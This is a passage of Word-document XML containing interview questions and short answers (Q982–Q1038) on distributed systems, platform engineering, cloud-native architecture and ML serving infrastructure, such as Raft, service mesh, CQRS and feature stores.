        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Sharding distributes data across multiple databases or nodes. It improves scale but adds complexity in routing, rebalancing, joins, transactions, and hot-shard prevention.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sharding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Q982. Explain replication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Replication copies data across nodes or regions for availability, read scaling, and disaster recovery. Designs must choose between synchronous and asynchronous replication tradeoffs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Replication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Q983. What is consensus algorithm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A consensus algorithm lets distributed nodes agree on a value or leader despite failures. It is used in systems such as etcd, databases, and coordination services.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Consensus Algorithm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Q984. Explain Raft.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Raft is a consensus algorithm designed to be understandable and reliable. It uses leader election, log replication, and majority agreement to keep distributed state consistent.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Raft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Q985. What is leader election?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Leader election selects one node to coordinate work in a distributed system. It prevents split-brain behavior and is used in controllers, databases, and schedulers.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Leader Election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Q986. Explain distributed locking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Distributed locking coordinates exclusive access to shared resources across multiple nodes. It must handle timeouts, crashes, fencing tokens, and lock ownership carefully.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Distributed Locking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Q987. Explain API versioning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: API versioning manages changes to APIs without breaking existing clients. Common approaches include URL versions, headers, backward-compatible changes, and deprecation windows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>API Versioning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Q988. What is observability in distributed systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Observability in distributed systems requires metrics, logs, traces, correlation IDs, dependency maps, and SLOs across all services. It helps debug partial failures and latency across service boundaries.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Observability In Distributed Systems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Q989. Explain tracing in microservices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Tracing in microservices follows a request across services using trace IDs and spans. It shows where latency and errors occur in a distributed call path.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Tracing In Microservices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Q990. What is service mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A service mesh manages service-to-service communication using sidecars or proxies. It can provide mTLS, traffic routing, retries, observability, and policy enforcement.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Service Mesh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Q991. Explain platform engineering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Platform engineering builds internal platforms that help developers ship software faster and safer. It focuses on self-service workflows, reusable infrastructure, golden paths, and operational standards.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Platform Engineering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Q992. What is internal developer platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An internal developer platform provides self-service tools, templates, pipelines, environments, and observability for engineering teams. It reduces cognitive load and standardizes delivery.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Internal Developer Platform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Q993. Explain golden paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Golden paths are recommended, well-supported ways for teams to build, deploy, and operate services. They combine templates, automation, policies, and documentation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Golden Paths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Q994. What is multi-tenancy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Multi-tenancy lets one platform serve multiple teams, customers, or workloads. It requires isolation, quota management, access control, observability, and cost attribution.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Multi-tenancy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Q995. Explain tenant isolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Tenant isolation prevents one tenant from accessing or affecting another tenant’s data, resources, or performance. It can be enforced at network, identity, data, compute, and application layers.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Tenant Isolation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Q996. What is cloud-native architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud-native architecture uses containers, managed services, automation, APIs, scalability, observability, and resilience patterns. It is designed for rapid change and reliable operation in cloud environments.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud-native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Q997. Explain event sourcing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Event sourcing stores state changes as a sequence of events rather than only the current state. It improves auditability and replay capability but adds complexity in querying and evolution.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Event Sourcing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Q998. What is CQRS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CQRS separates command operations that change state from query operations that read state. It can improve scalability and domain clarity but is more complex than a simple CRUD model.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cqrs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Q999. Explain stream processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stream processing continuously processes data as it arrives. It is used for real-time analytics, fraud detection, monitoring, IoT, and event-driven systems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Stream Processing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Q1000. What is serverless design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Serverless design uses managed compute that scales automatically and charges based on usage. It is useful for event-driven and variable workloads, but requires attention to cold starts, limits, and observability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Serverless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Q1001. Explain queue backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Queue backpressure occurs when producers generate work faster than consumers can process it. Systems handle it with rate limits, autoscaling, buffering, prioritization, shedding, and alerts.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Queue Backpressure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Q1002. What is autoscaling strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An autoscaling strategy defines what resources scale, which metrics trigger scaling, limits, cooldowns, and safeguards. Good strategies combine demand metrics, resource metrics, and capacity planning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Autoscaling Strategy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Q1003. Explain queue-based scaling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Queue-based scaling adjusts worker count based on queue depth, message age, or processing lag. It is effective for asynchronous workloads because it scales with actual backlog.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Queue-based Scaling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Q1004. What is cold start?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cold start is the delay when a serverless function, container, or service instance starts from zero or idle state. It can be reduced with provisioned capacity, warm pools, smaller images, and optimized initialization.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cold Start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Q1005. Explain API throttling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: API throttling limits request rates to protect systems and enforce fair usage. It is usually implemented at gateways, load balancers, or service layers.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>API Throttling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Q1006. What is resilience testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Resilience testing verifies how systems behave under failures such as dependency outages, node loss, latency, traffic spikes, and network partitions. It validates recovery mechanisms and runbooks.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Resilience Testing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Q1007. Explain chaos engineering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Chaos engineering intentionally injects controlled failures to learn how systems behave. It improves resilience by validating assumptions before real incidents occur.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Chaos Engineering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Q1008. What is graceful degradation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Graceful degradation keeps critical functionality available when some components fail. Nonessential features may be disabled while core user journeys continue.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Graceful Degradation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Q1009. Explain fallback strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Fallback strategies provide alternate behavior when a dependency fails, such as cached data, default responses, degraded features, backup regions, or manual workflows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Fallback Strategies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Q1010. What is blue-green architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Blue-green architecture maintains two complete environments and switches traffic between them for releases or rollback. It reduces downtime and release risk.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Blue-green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Q1011. Explain canary analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Canary analysis compares metrics from a new version against a stable baseline before full rollout. It looks at errors, latency, saturation, business metrics, and logs to decide promotion or rollback.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Canary Analysis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Q1012. What is workload isolation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workload isolation separates workloads so failures, security issues, or resource contention do not spread. It can use namespaces, node pools, quotas, network policies, tenants, and dedicated clusters.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Workload Isolation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Q1013. Explain platform reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Platform reliability is the ability of shared infrastructure and developer platforms to remain available, predictable, and recoverable. It relies on SLOs, automation, observability, capacity planning, and incident response.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Platform Reliability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Q1014. What is blast radius?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Blast radius is the scope of impact when a failure or security issue occurs. Good architecture reduces blast radius through isolation, gradual rollout, least privilege, and segmented infrastructure.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Blast Radius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Q1015. Explain bulkhead pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The bulkhead pattern isolates resources so failure in one area does not sink the whole system. Examples include separate thread pools, queues, node pools, or service partitions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bulkhead Pattern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Q1016. What is anti-corruption layer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An anti-corruption layer translates between a new system/domain and an external or legacy system. It prevents unwanted models, assumptions, or dependencies from leaking into the core domain.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Anti-corruption Layer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Q1017. Explain hexagonal architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Hexagonal architecture separates business logic from external interfaces such as databases, APIs, queues, and UIs. It uses ports and adapters to improve testability and flexibility.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Hexagonal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Q1018. What is domain-driven design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Domain-driven design models software around business domains, language, entities, aggregates, and bounded contexts. It is useful for complex business systems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Domain-driven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Q1019. Explain bounded context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A bounded context defines where a domain model and language are valid. It helps split complex systems into clearer service or module boundaries.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bounded Context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Q1020. What is technical debt?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Technical debt is the future cost created by shortcuts, outdated designs, weak tests, or poor maintainability. It should be tracked, prioritized, and reduced based on risk and business impact.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Technical Debt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Q1021. Explain architecture governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Architecture governance ensures systems follow agreed standards for security, reliability, scalability, cost, and maintainability. It works best as lightweight guidance, review, and automation rather than heavy bureaucracy.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Architecture Governance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Q1022. What is platform scalability challenge?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Platform scalability challenges include multi-tenant isolation, cluster capacity, CI/CD throughput, observability volume, cost growth, quota limits, service dependencies, and operational ownership.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Platform Scalability Challenge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Q1023. Explain data lake architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A data lake architecture stores raw and processed data in object storage with governance, cataloging, access control, lifecycle management, and processing engines. It supports analytics, ML, and batch processing.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Data Lake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Q1024. What is lakehouse?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A lakehouse combines data lake storage with warehouse-like features such as ACID transactions, schema enforcement, metadata management, and optimized queries. Examples include Delta Lake, Iceberg, and Hudi-based designs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Lakehouse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Q1025. Explain ML platform design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ML platform design provides shared capabilities for data ingestion, feature engineering, experiment tracking, training, model registry, deployment, monitoring, and governance. It should support reproducibility, self-service, security, and scale.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>ML Platform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Q1026. What is feature store architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature store architecture manages reusable ML features for training and inference. It usually includes offline storage, online low-latency serving, feature definitions, metadata, validation, and access controls.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Feature Store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Q1027. Explain real-time inference design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Real-time inference design serves predictions with low latency through APIs, model servers, autoscaling, caching, batching, monitoring, and rollback. It must handle latency budgets, traffic spikes, and model versioning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Real-time Inference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Q1028. What is model serving architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model serving architecture exposes trained models for predictions through REST, gRPC, batch, or streaming interfaces. It includes model loading, scaling, routing, versioning, monitoring, and security.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Model Serving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Q1029. Explain ML training platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An ML training platform provides compute, orchestration, data access, experiment tracking, distributed training, artifact management, and reproducible environments for data scientists and ML engineers.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>ML Training Platform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Q1030. What is inference gateway?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An inference gateway routes prediction requests to the correct model version or endpoint. It can handle authentication, rate limiting, A/B tests, canaries, request logging, and policy enforcement.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Inference Gateway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Q1031. Explain GPU cluster architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GPU cluster architecture provides accelerated compute for training or inference using GPU node pools, schedulers, quotas, drivers, monitoring, storage, and workload isolation. Efficiency depends on utilization, placement, and job orchestration.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>GPU Cluster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Q1032. What is edge inference?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Edge inference runs ML predictions on devices or locations near the data source. It reduces latency and bandwidth and improves privacy, but requires model optimization and device management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Edge Inference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Q1033. Explain hybrid cloud architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Hybrid cloud architecture connects on-prem systems with cloud services. It requires secure networking, identity integration, consistent observability, data movement strategy, and clear workload placement decisions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Hybrid Cloud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Q1034. What is API-first design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: API-first design defines APIs as product contracts before implementation. It improves integration, consistency, documentation, testing, and collaboration between frontend, backend, and platform teams.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Api-first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Q1035. Explain workflow orchestration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workflow orchestration coordinates multi-step processes with dependencies, retries, scheduling, state, and observability. Tools include Airflow, Argo Workflows, Dagster, Prefect, and cloud-native orchestrators.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Workflow Orchestration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Q1036. What is distributed tracing architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Distributed tracing architecture instruments services to emit spans with trace context, sends them through collectors, stores traces, and visualizes request paths. It should include sampling and correlation with logs and metrics.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Distributed Tracing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Q1037. Explain observability pipeline design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Observability pipeline design collects telemetry, enriches it, filters noise, samples high-volume data, protects sensitive fields, routes to tools, and controls retention and cost.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Observability Pipeline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Q1038. What is DR testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
